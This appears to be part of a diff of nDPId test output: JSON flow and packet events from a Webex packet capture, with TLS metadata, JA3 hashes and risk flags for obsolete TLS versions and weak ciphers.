-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"} 
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1444570640284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAAoAfNAABAGIixyHcqLCggAAQG7uB9iqEDInVe\/OFAS\/\/+vRQAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640284,"flow_last_seen":1444570640284,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640284,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1444570640284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAA8nBhAAEAGTKkKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiE1wAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1444570640298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAAoAfRAABAGFuJyHdXUCggAAQG7ox2Q5KAQbxtf8FAS\/\/+4\/gAA"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640298,"flow_last_seen":1444570640298,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640298,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1444570640298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAA8YQlAAEAGkVsKCAABch3MMcncAbvjbaL+AAAAAKACOQiwWQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1444570640309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640309,"pkt":"ABoRAAACABoRAAABCABFAAAoAfVAABAGIIRyHcwxCggAAQG7ydwckl0B422i\/1AS\/\/+b4gAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640310,"flow_last_seen":1444570640310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640310,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1444570640310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640310,"pkt":"ABoRAAACABoRAAABCABFAAA8S45AAEAGO38KCAABQERpYpETAbtLyIh5AAAAAKACOQgv9gAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1444570640319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAAoAfZAABAGtStARGliCggAAQG7kRO0N3eGS8iIelAS\/\/9pVAAA"} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640319,"flow_last_seen":1444570640319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640319,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1444570640319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640319,"pkt":"ABoRAAACABoRAAABCABFAAA8c3VAAEAGE5MKCAABQERpZ6GyAbtpybCOAAAAAKACOQjZNwAAAgQFtAQCCAoATMP7AAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1444570640330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAAoAfdAABAGtSVARGlnCggAAQG7obKWNk9xacmwj1AS\/\/9YsAAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640330,"flow_last_seen":1444570640330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640330,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1444570640330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640330,"pkt":"ABoRAAACABoRAAABCABFAAA8tGhAAEAGXWUKCAABPm3geMe+AbssX3BwAAAAAKACOQi7XAAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1444570640338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAAoAfhAABAGP+o+beB4CggAAQG7x77ToI+PLF9wcVAS\/\/+9aQAA"} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640338,"flow_last_seen":1444570640338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640338,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1444570640338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640338,"pkt":"ABoRAAACABoRAAABCABFAAA82ZNAAEAGODoKCAABPm3geMe\/Abvolh2LAAAAAKACOQhSCQAAAgQFtAQCCAoATMQYAAAAAAEDAwY="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1444570640344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640344,"pkt":"ABoRAAACABoRAAABCABFAAAoAflAABAGP+k+beB4CggAAQG7x78XaeJ06JYdjFAS\/\/+9aAAA"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1444570640346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1444570640346,"pkt":"ABoRAAACABoRAAABCABFAABLP\/ZAAEAGY3QKhc4vUEpuRIKzAbsvtI0Fj3ahWYAYAWE\/AgAAAQEICgBMxFRXHeViFQMBABJ8gv9dmaTjHFUtA85jnlaY0C8="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1444570640347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAA0P\/dAAEAGY4oKhc4vUEpuRIKzAbsvtI0cj3ahWYARAWFq6AAAAQEICgBMxFRXHeVi"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1444570640347,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAAoAfpAABAG0ZNQSm5ECoXOLwG7grOPdqFZL7SNHVAQ\/\/+mgQAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1444570640348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640348,"pkt":"ABoRAAACABoRAAABCABFAAA8fMFAAEAGd0kKCAABch3Ki7gfAbudV783AAAAAKACOQjtNQAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1444570640356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640356,"pkt":"ABoRAAACABoRAAABCABFAAA8nBlAAEAGTKgKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiEcwAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} 